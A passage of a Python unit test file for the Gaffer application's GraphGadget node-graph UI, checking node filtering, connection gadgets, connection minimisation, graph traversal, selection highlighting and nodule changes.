script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( script.children() )
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
nodeFilter.remove( script["add2"] )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNone( g.nodeGadget( script["add2"] ) )
script["add2"]["op1"].setInput( script["add1"]["sum"] )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNone( g.nodeGadget( script["add2"] ) )
self.assertIsNone( g.connectionGadget( script["add2"]["op1"] ) )
def testConnectingHiddenSrcNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
script["add2"]["op1"].setInput( script["add1"]["sum"] )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.assertIsNotNone( c )
self.assertIsNone( c.srcNodule() )
def testConnectingHiddenSrcNodesAndReshowing( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
script["add2"]["op1"].setInput( script["add1"]["sum"] )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.assertIsNotNone( c )
self.assertIsNone( c.srcNodule() )
nodeFilter.add( script["add1"] )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.assertIsNotNone( c )
self.assertTrue( c.srcNodule().plug().isSame( script["add1"]["sum"] ) )
def testChangingFilter( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNone( g.nodeGadget( script["add2"] ) )
nodeFilter2 = Gaffer.StandardSet( [ script["add2"] ] )
g.setFilter( nodeFilter2 )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
def testChangingFilterAndEditingOriginal( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet()
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNone( g.nodeGadget( script["add2"] ) )
nodeFilter2 = Gaffer.StandardSet( [ script["add2"] ] )
g.setFilter( nodeFilter2 )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
nodeFilter.add( script["add1"] )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
def testConnectionsForNestedPlugs( self ) :
script = Gaffer.ScriptNode()
script["n"] = NestedPlugTestNode()
script["n"]["c"] = Gaffer.Plug()
script["n"]["c"]["i"] = Gaffer.IntPlug()
script["n2"] = NestedPlugTestNode()
script["n2"]["c"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
script["n2"]["c"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
script["n"]["c"]["i"].setInput( script["n2"]["c"]["o"] )
s = Gaffer.StandardSet( script.children() )
g = GafferUI.GraphGadget( script, s )
c = g.connectionGadget( script["n"]["c"]["i"] )
self.assertIsNotNone( c )
self.assertTrue( c.srcNodule().plug().isSame( script["n2"]["c"]["o"] ) )
self.assertTrue( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
s.remove( script["n2"] )
self.assertIsNone( g.nodeGadget( script["n2"] ) )
c = g.connectionGadget( script["n"]["c"]["i"] )
self.assertIsNotNone( c )
self.assertIsNone( c.srcNodule() )
self.assertTrue( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
s.add( script["n2"] )
self.assertIsNotNone( g.nodeGadget( script["n2"] ) )
c = g.connectionGadget( script["n"]["c"]["i"] )
self.assertIsNotNone( c )
self.assertTrue( c.srcNodule().plug().isSame( script["n2"]["c"]["o"] ) )
self.assertTrue( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
s.remove( script["n"] )
self.assertIsNone( g.nodeGadget( script["n"] ) )
self.assertIsNone( g.connectionGadget( script["n"]["c"]["i"] ) )
s.add( script["n"] )
self.assertIsNotNone( g.nodeGadget( script["n"] ) )
c = g.connectionGadget( script["n"]["c"]["i"] )
self.assertIsNotNone( c )
self.assertTrue( c.srcNodule().plug().isSame( script["n2"]["c"]["o"] ) )
self.assertTrue( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
def testRemovePlugWithInputConnection( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n2"] = Gaffer.Node()
script["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
script["n2"]["i"] = Gaffer.IntPlug()
script["n2"]["i"].setInput( script["n1"]["o"] )
g = GafferUI.GraphGadget( script )
self.assertIsNotNone( g.connectionGadget( script["n2"]["i"] ) )
with Gaffer.UndoScope( script ) :
removedPlug = script["n2"]["i"]
del script["n2"]["i"]
self.assertIsNone( g.connectionGadget( removedPlug ) )
script.undo()
self.assertIsNotNone( g.connectionGadget( script["n2"]["i"] ) )
def testRemovePlugWithOutputConnection( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n2"] = Gaffer.Node()
script["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
script["n2"]["i"] = Gaffer.IntPlug()
script["n2"]["i"].setInput( script["n1"]["o"] )
g = GafferUI.GraphGadget( script )
self.assertIsNotNone( g.connectionGadget( script["n2"]["i"] ) )
with Gaffer.UndoScope( script ) :
del script["n1"]["o"]
self.assertIsNone( g.connectionGadget( script["n2"]["i"] ) )
script.undo()
self.assertIsNotNone( g.connectionGadget( script["n2"]["i"] ) )
def testConnectionBound( self ) :
for i in range( 0, 100 ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n2"] = Gaffer.Node()
script["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
script["n2"]["i"] = Gaffer.IntPlug()
script["n2"]["i"].setInput( script["n1"]["o"] )
g = GafferUI.GraphGadget( script )
c = g.connectionGadget( script["n2"]["i"] )
gb = imath.Box3f()
gb.extendBy( g.nodeGadget( script["n1"] ).bound() )
gb.extendBy( g.nodeGadget( script["n2"] ).bound() )
gb.setMin( gb.min() - imath.V3f( 10 ) )
gb.setMax( gb.max() + imath.V3f( 10 ) )
b = c.bound()
self.assertFalse( b.isEmpty() )
self.assertTrue( IECore.BoxAlgo.contains( gb, b ) )
def testNoFilter( self ) :
s = Gaffer.ScriptNode()
s["n1"] = Gaffer.Node()
g = GafferUI.GraphGadget( s )
self.assertTrue( g.getRoot().isSame( s ) )
self.assertTrue( g.getFilter() is None )
self.assertTrue( g.nodeGadget( s["n1"] ) )
s["n2"] = Gaffer.Node()
self.assertTrue( g.nodeGadget( s["n1"] ) )
def testFilterIsChildSet( self ) :
s = Gaffer.ScriptNode()
s["n1"] = Gaffer.Node()
g = GafferUI.GraphGadget( s, Gaffer.ChildSet( s ) )
self.assertTrue( g.nodeGadget( s["n1"] ) )
l = len( g )
s["n2"] = Gaffer.Node()
self.assertTrue( g.nodeGadget( s["n2"] ) )
self.assertEqual( len( g ), l + 1 )
def testSetRoot( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
s["b"]["n"] = Gaffer.Node()
f = Gaffer.StandardSet( [ s["b"] ] )
g = GafferUI.GraphGadget( s, f )
self.assertTrue( g.nodeGadget( s["b"] ) )
self.assertFalse( g.nodeGadget( s["b"]["n"] ) )
g.setRoot( s["b"] )
self.assertTrue( g.getRoot().isSame( s["b"] ) )
self.assertEqual( g.getFilter(), None )
self.assertTrue( g.nodeGadget( s["b"]["n"] ) )
self.assertFalse( g.nodeGadget( s["b"] ) )
def testRootChangedSignal( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
roots = []
previousRoots = []
def f( gg, previousRoot ) :
self.assertTrue( gg.isSame( g ) )
roots.append( gg.getRoot() )
previousRoots.append( previousRoot )
g = GafferUI.GraphGadget( s )
c = g.rootChangedSignal().connect( f )
self.assertEqual( len( roots ), 0 )
self.assertEqual( len( previousRoots ), 0 )
g.setRoot( s["b"] )
self.assertEqual( len( roots ), 1 )
self.assertTrue( roots[0].isSame( s["b"] ) )
self.assertEqual( len( previousRoots ), 1 )
self.assertTrue( previousRoots[0].isSame( s ) )
g.setRoot( s["b"] )
self.assertEqual( len( roots ), 1 )
self.assertTrue( roots[0].isSame( s["b"] ) )
self.assertEqual( len( previousRoots ), 1 )
self.assertTrue( previousRoots[0].isSame( s ) )
g.setRoot( s )
self.assertEqual( len( roots ), 2 )
self.assertTrue( roots[1].isSame( s ) )
self.assertEqual( len( previousRoots ), 2 )
self.assertTrue( previousRoots[1].isSame( s["b"] ) )
def testSetNodePosition( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
g = GafferUI.GraphGadget( s )
self.assertFalse( g.hasNodePosition( s["n"] ) )
g.setNodePosition( s["n"], imath.V2f( -100, 2000 ) )
self.assertEqual( g.getNodePosition( s["n"] ), imath.V2f( -100, 2000 ) )
self.assertTrue( g.hasNodePosition( s["n"] ) )
def testPlugConnectionGadgets( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add3"] = GafferTest.AddNode()
script["add4"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
script["add3"]["op1"].setInput( script["add2"]["sum"] )
script["add4"]["op2"].setInput( script["add2"]["sum"] )
g = GafferUI.GraphGadget( script )
c = g.connectionGadgets( script["add1"]["sum"] )
self.assertEqual( len( c ), 1 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add1"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add2"]["op1"] ) )
c = g.connectionGadgets( script["add1"]["sum"], excludedNodes = Gaffer.StandardSet( [ script["add2"] ] ) )
self.assertEqual( len( c ), 0 )
c = g.connectionGadgets( script["add2"]["sum"] )
self.assertEqual( len( c ), 2 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add3"]["op1"] ) )
self.assertTrue( c[1].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[1].dstNodule().plug().isSame( script["add4"]["op2"] ) )
c = g.connectionGadgets( script["add2"]["sum"], excludedNodes = Gaffer.StandardSet( [ script["add3"] ] ) )
self.assertEqual( len( c ), 1 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add4"]["op2"] ) )
def testNodeConnectionGadgets( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add3"] = GafferTest.AddNode()
script["add4"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
script["add3"]["op1"].setInput( script["add2"]["sum"] )
script["add4"]["op2"].setInput( script["add2"]["sum"] )
g = GafferUI.GraphGadget( script )
c = g.connectionGadgets( script["add1"] )
self.assertEqual( len( c ), 1 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add1"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add2"]["op1"] ) )
c = g.connectionGadgets( script["add1"], excludedNodes = Gaffer.StandardSet( [ script["add2"] ] ) )
self.assertEqual( len( c ), 0 )
c = g.connectionGadgets( script["add2"] )
self.assertEqual( len( c ), 3 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add1"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add2"]["op1"] ) )
self.assertTrue( c[1].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[1].dstNodule().plug().isSame( script["add3"]["op1"] ) )
self.assertTrue( c[2].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[2].dstNodule().plug().isSame( script["add4"]["op2"] ) )
c = g.connectionGadgets( script["add2"], excludedNodes = Gaffer.StandardSet( [ script["add3"] ] ) )
self.assertEqual( len( c ), 2 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add1"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add2"]["op1"] ) )
self.assertTrue( c[1].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[1].dstNodule().plug().isSame( script["add4"]["op2"] ) )
def testInternalConnectionsNotShown( self ) :
# make sure they're not shown when they exist before graph visualisation
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add1"]["sum"].setInput( script["add1"]["op1"] )
script["add1"]["op1"].setInput( script["add1"]["op2"] )
g = GafferUI.GraphGadget( script )
self.assertEqual( len( g.connectionGadgets( script["add1"] ) ), 0 )
self.assertEqual( g.connectionGadget( script["add1"]["sum"] ), None )
self.assertEqual( g.connectionGadget( script["add1"]["op1"] ), None )
self.assertEqual( g.connectionGadget( script["add1"]["op2"] ), None )
# make sure they're not shown when they're made after graph visualisation
script = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( script )
script["add1"] = GafferTest.AddNode()
script["add1"]["sum"].setInput( script["add1"]["op1"] )
script["add1"]["op1"].setInput( script["add1"]["op2"] )
self.assertEqual( len( g.connectionGadgets( script["add1"] ) ), 0 )
self.assertEqual( g.connectionGadget( script["add1"]["sum"] ), None )
self.assertEqual( g.connectionGadget( script["add1"]["op1"] ), None )
self.assertEqual( g.connectionGadget( script["add1"]["op2"] ), None )
def testConnectionMinimisedAccessors( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add3"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
script["add3"]["op1"].setInput( script["add2"]["sum"] )
g = GafferUI.GraphGadget( script )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add3"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add3"] ) )
g.setNodeInputConnectionsMinimised( script["add3"], True )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add2"] ) )
self.assertTrue( g.getNodeInputConnectionsMinimised( script["add3"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add3"] ) )
g.setNodeOutputConnectionsMinimised( script["add2"], True )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add2"] ) )
self.assertTrue( g.getNodeInputConnectionsMinimised( script["add3"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add1"] ) )
self.assertTrue( g.getNodeOutputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add3"] ) )
g.setNodeOutputConnectionsMinimised( script["add2"], False )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add2"] ) )
self.assertTrue( g.getNodeInputConnectionsMinimised( script["add3"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add3"] ) )
g.setNodeInputConnectionsMinimised( script["add3"], False )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add3"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add3"] ) )
def testConnectionMinimisation( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add3"] = GafferTest.AddNode()
g = GafferUI.GraphGadget( script )
g.setNodeOutputConnectionsMinimised( script["add1"], True )
script["add2"]["op1"].setInput( script["add1"]["sum"] )
c1 = g.connectionGadget( script["add2"]["op1"] )
self.assertTrue( c1.getMinimised() )
script["add3"]["op1"].setInput( script["add2"]["sum"] )
c2 = g.connectionGadget( script["add3"]["op1"] )
self.assertFalse( c2.getMinimised() )
g.setNodeInputConnectionsMinimised( script["add2"], True )
self.assertTrue( c1.getMinimised() )
self.assertFalse( c2.getMinimised() )
g.setNodeOutputConnectionsMinimised( script["add1"], False )
self.assertTrue( c1.getMinimised() )
self.assertFalse( c2.getMinimised() )
g.setNodeInputConnectionsMinimised( script["add2"], False )
self.assertFalse( c1.getMinimised() )
self.assertFalse( c2.getMinimised() )
def testNodeGadgetCreatorReturningNull( self ) :
class InvisibleNode( GafferTest.AddNode ) :
def __init__( self, name = "InvisibleNode" ) :
GafferTest.AddNode.__init__( self, name )
IECore.registerRunTimeTyped( InvisibleNode )
GafferUI.NodeGadget.registerNodeGadget( InvisibleNode, lambda node : None )
script = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( script )
script["n1"] = InvisibleNode()
script["n2"] = InvisibleNode()
self.assertEqual( g.nodeGadget( script["n1"] ), None )
self.assertEqual( g.nodeGadget( script["n2"] ), None )
script["n2"]["op1"].setInput( script["n1"]["sum"] )
self.assertEqual( g.connectionGadget( script["n2"]["op1"] ), None )
# in case it wasn't clear, hiding the nodes has zero
# effect on their computations.
script["n1"]["op1"].setValue( 12 )
script["n1"]["op2"].setValue( 13 )
script["n2"]["op2"].setValue( 100 )
self.assertEqual( script["n2"]["sum"].getValue(), 125 )
def testUpstreamNodeGadgets( self ) :
script = Gaffer.ScriptNode()
# a -> b -> c -> e -> f
# ^
# |
# d
script["a"] = GafferTest.AddNode()
script["b"] = GafferTest.AddNode()
script["c"] = GafferTest.AddNode()
script["d"] = GafferTest.AddNode()
script["e"] = GafferTest.AddNode()
script["f"] = GafferTest.AddNode()
script["b"]["op1"].setInput( script["a"]["sum"] )
script["c"]["op1"].setInput( script["b"]["sum"] )
script["c"]["op2"].setInput( script["d"]["sum"] )
script["e"]["op1"].setInput( script["c"]["sum"] )
script["f"]["op1"].setInput( script["e"]["sum"] )
g = GafferUI.GraphGadget( script )
u = [ x.node().relativeName( script ) for x in g.upstreamNodeGadgets( script["c"] ) ]
self.assertEqual( len( u ), 3 )
self.assertEqual( set( u ), set( [ "a", "b", "d" ] ) )
u = [ x.node().relativeName( script ) for x in g.upstreamNodeGadgets( script["f"] ) ]
self.assertEqual( len( u ), 5 )
self.assertEqual( set( u ), set( [ "a", "b", "d", "c", "e" ] ) )
# the degreesOfSeparation argument should limit the depth
# of the search.
u = [ x.node().relativeName( script ) for x in g.upstreamNodeGadgets( script["c"], degreesOfSeparation = 1 ) ]
self.assertEqual( len( u ), 2 )
self.assertEqual( set( u ), set( [ "b", "d" ] ) )
# filtered nodes should be ignored
g.setFilter( Gaffer.StandardSet( [ script["f"], script["e"], script["a"] ] ) )
u = [ x.node().relativeName( script ) for x in g.upstreamNodeGadgets( script["f"] ) ]
self.assertEqual( u, [ "e" ] )
def testDownstreamNodeGadgets( self ) :
script = Gaffer.ScriptNode()
# a -> b -> c -> e -> f
# |
# v
# d
script["a"] = GafferTest.AddNode()
script["b"] = GafferTest.AddNode()
script["c"] = GafferTest.AddNode()
script["d"] = GafferTest.AddNode()
script["e"] = GafferTest.AddNode()
script["f"] = GafferTest.AddNode()
script["b"]["op1"].setInput( script["a"]["sum"] )
script["c"]["op1"].setInput( script["b"]["sum"] )
script["d"]["op1"].setInput( script["c"]["sum"] )
script["e"]["op1"].setInput( script["c"]["sum"] )
script["f"]["op1"].setInput( script["e"]["sum"] )
g = GafferUI.GraphGadget( script )
u = [ x.node().relativeName( script ) for x in g.downstreamNodeGadgets( script["b"] ) ]
self.assertEqual( len( u ), 4 )
self.assertEqual( set( u ), set( [ "c", "d", "e", "f" ] ) )
u = [ x.node().relativeName( script ) for x in g.downstreamNodeGadgets( script["e"] ) ]
self.assertEqual( len( u ), 1 )
self.assertEqual( set( u ), set( [ "f" ] ) )
u = [ x.node().relativeName( script ) for x in g.downstreamNodeGadgets( script["c"], degreesOfSeparation = 1 ) ]
self.assertEqual( len( u ), 2 )
self.assertEqual( set( u ), set( [ "d", "e" ] ) )
def testConnectedNodeGadgets( self ) :
script = Gaffer.ScriptNode()
# a -> b -> c -> e -> f
# |
# v
# d
script["a"] = GafferTest.AddNode()
script["b"] = GafferTest.AddNode()
script["c"] = GafferTest.AddNode()
script["d"] = GafferTest.AddNode()
script["e"] = GafferTest.AddNode()
script["f"] = GafferTest.AddNode()
script["b"]["op1"].setInput( script["a"]["sum"] )
script["c"]["op1"].setInput( script["b"]["sum"] )
script["d"]["op1"].setInput( script["c"]["sum"] )
script["e"]["op1"].setInput( script["c"]["sum"] )
script["f"]["op1"].setInput( script["e"]["sum"] )
g = GafferUI.GraphGadget( script )
# test traversing in both directions
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["b"] ) ]
self.assertEqual( set( u ), set( [ "a", "c", "d", "e", "f" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["e"] ) ]
self.assertEqual( set( u ), set( [ "a", "b", "c", "d", "f" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["c"], degreesOfSeparation = 1 ) ]
self.assertEqual( set( u ), set( [ "b", "d", "e" ] ) )
# test traversing upstream
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["c"], direction = Gaffer.Plug.Direction.In ) ]
self.assertEqual( set( u ), set( [ "a", "b" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["c"], direction = Gaffer.Plug.Direction.In, degreesOfSeparation = 1 ) ]
self.assertEqual( set( u ), set( [ "b" ] ) )
# test traversing downstream
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["c"], direction = Gaffer.Plug.Direction.Out ) ]
self.assertEqual( set( u ), set( [ "d", "e", "f" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["c"], direction = Gaffer.Plug.Direction.Out, degreesOfSeparation = 1 ) ]
self.assertEqual( set( u ), set( [ "d", "e" ] ) )
# test that invisible nodes are ignored
g.setFilter( Gaffer.StandardSet( [ script["f"], script["e"], script["c"] ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["e"] ) ]
self.assertEqual( set( u ), set( [ "f", "c" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["e"], direction = Gaffer.Plug.Direction.In ) ]
self.assertEqual( set( u ), set( [ "c" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["e"], direction = Gaffer.Plug.Direction.Out ) ]
self.assertEqual( set( u ), set( [ "f" ] ) )
def testSelectionHighlighting( self ) :
script = Gaffer.ScriptNode()
script["a"] = GafferTest.AddNode()
script["b"] = GafferTest.AddNode()
script.selection().add( script["a"] )
g = GafferUI.GraphGadget( script )
self.assertTrue( g.nodeGadget( script["a"] ).getHighlighted() )
self.assertFalse( g.nodeGadget( script["b"] ).getHighlighted() )
script.selection().add( script["b"] )
self.assertTrue( g.nodeGadget( script["a"] ).getHighlighted() )
self.assertTrue( g.nodeGadget( script["b"] ).getHighlighted() )
script.selection().remove( script["a"] )
self.assertFalse( g.nodeGadget( script["a"] ).getHighlighted() )
self.assertTrue( g.nodeGadget( script["b"] ).getHighlighted() )
script.selection().clear()
self.assertFalse( g.nodeGadget( script["a"] ).getHighlighted() )
self.assertFalse( g.nodeGadget( script["b"] ).getHighlighted() )
def testNoDuplicatePositionPlugsAfterPasting( self ) :
script = Gaffer.ScriptNode()
script["n"] = Gaffer.Node()
g = GafferUI.GraphGadget( script )
g.setNodePosition( script["n"], imath.V2f( 1, 2 ) )
self.assertTrue( g.hasNodePosition( script["n"] ) )
script.execute( script.serialise( script, Gaffer.StandardSet( [ script["n"] ] ) ) )
self.assertTrue( "__uiPosition" in script["n1"] )
self.assertFalse( "__uiPosition1" in script["n1"] )
def testErrorAndDelete( self ) :
# Create a script with a dodgy node,
# and a GraphGadget for displaying it.
script = Gaffer.ScriptNode()
script["n"] = GafferTest.BadNode()
graphGadget = GafferUI.GraphGadget( script )
# Arrange for the node to error on
# a background thread.
def f() :
with IECore.IgnoredExceptions( Exception ) :
script["n"]["out1"].getValue()
r = threading.Thread( target = f )
r.start()
r.join()
# Delete the node on the
# foreground thread - this will
# remove the NodeGadget inside
# the GraphGadget.
del script["n"]
# Run idle events. Woe betide any NodeGadget
# implementation assuming it will still be
# alive at arbitrary points in the future!
self.waitForIdle( 1000 )
def testMovePlugWithInputConnection( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n1"]["p"] = Gaffer.Plug()
script["n2"] = Gaffer.Node()
script["n2"]["p"] = Gaffer.Plug()
script["n2"]["p"].setInput( script["n1"]["p"] )
g = GafferUI.GraphGadget( script )
script["n3"] = Gaffer.Node()
script["n3"]["p"] = script["n2"]["p"]
connection = g.connectionGadget( script["n3"]["p"] )
dstNodule = connection.dstNodule()
srcNodule = connection.srcNodule()
self.assertTrue( dstNodule.plug().isSame( script["n3"]["p"] ) )
self.assertTrue( srcNodule.plug().isSame( script["n1"]["p"] ) )
self.assertTrue( g.nodeGadget( script["n1"] ).isAncestorOf( srcNodule ) )
self.assertTrue( g.nodeGadget( script["n3"] ).isAncestorOf( dstNodule ) )
def testMovePlugWithInputConnectionOutsideGraph( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n1"]["p"] = Gaffer.Plug()
script["n2"] = Gaffer.Node()
script["n2"]["p"] = Gaffer.Plug()
script["n2"]["p"].setInput( script["n1"]["p"] )
g = GafferUI.GraphGadget( script )
n3 = Gaffer.Node()
n3["p"] = script["n2"]["p"]
self.assertEqual( g.connectionGadget( n3["p"] ), None )
def testRemoveNoduleWithInputConnection( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n1"]["p"] = Gaffer.Plug()
script["n2"] = Gaffer.Node()
script["n2"]["p"] = Gaffer.Plug()
script["n2"]["p"].setInput( script["n1"]["p"] )
g = GafferUI.GraphGadget( script )
self.assertTrue( g.nodeGadget( script["n2"] ).nodule( script["n2"]["p"] ) is not None )
self.assertTrue( g.connectionGadget( script["n2"]["p"] ) is not None )
Gaffer.Metadata.registerValue( script["n2"]["p"], "nodule:type", "" )
self.assertTrue( g.nodeGadget( script["n2"] ).nodule( script["n2"]["p"] ) is None )
self.assertTrue( g.connectionGadget( script["n2"]["p"] ) is None )
def testRemoveNoduleWithOutputConnections( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n1"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
script["n2"] = Gaffer.Node()
script["n2"]["in"] = Gaffer.Plug()
script["n2"]["in"].setInput( script["n1"]["out"] )
g = GafferUI.GraphGadget( script )
c = g.connectionGadget( script["n2"]["in"] )
self.assertTrue( c is not None )
self.assertTrue( c.srcNodule().plug().isSame( script["n1"]["out"] ) )
self.assertTrue( c.dstNodule().plug().isSame( script["n2"]["in"] ) )
Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "" )
c = g.connectionGadget( script["n2"]["in"] )
self.assertTrue( c is not None )
self.assertTrue( c.srcNodule() is None )
self.assertTrue( c.dstNodule().plug().isSame( script["n2"]["in"] ) )
Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "GafferUI::StandardNodule" )
c = g.connectionGadget( script["n2"]["in"] )
self.assertTrue( c is not None )
self.assertTrue( c.srcNodule().plug().isSame( script["n1"]["out"] ) )
self.assertTrue( c.dstNodule().plug().isSame( script["n2"]["in"] ) )
def testAddNoduleWithInputConnection( self ) :
script = Gaffer.ScriptNode()
script["n"] = Gaffer.Node()
script["n"]["in"] = Gaffer.Plug()
script["n"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
script["n"]["out"].setInput( script["n"]["in"] )
Gaffer.Metadata.registerValue( script["n"]["out"], "nodule:type", "" )
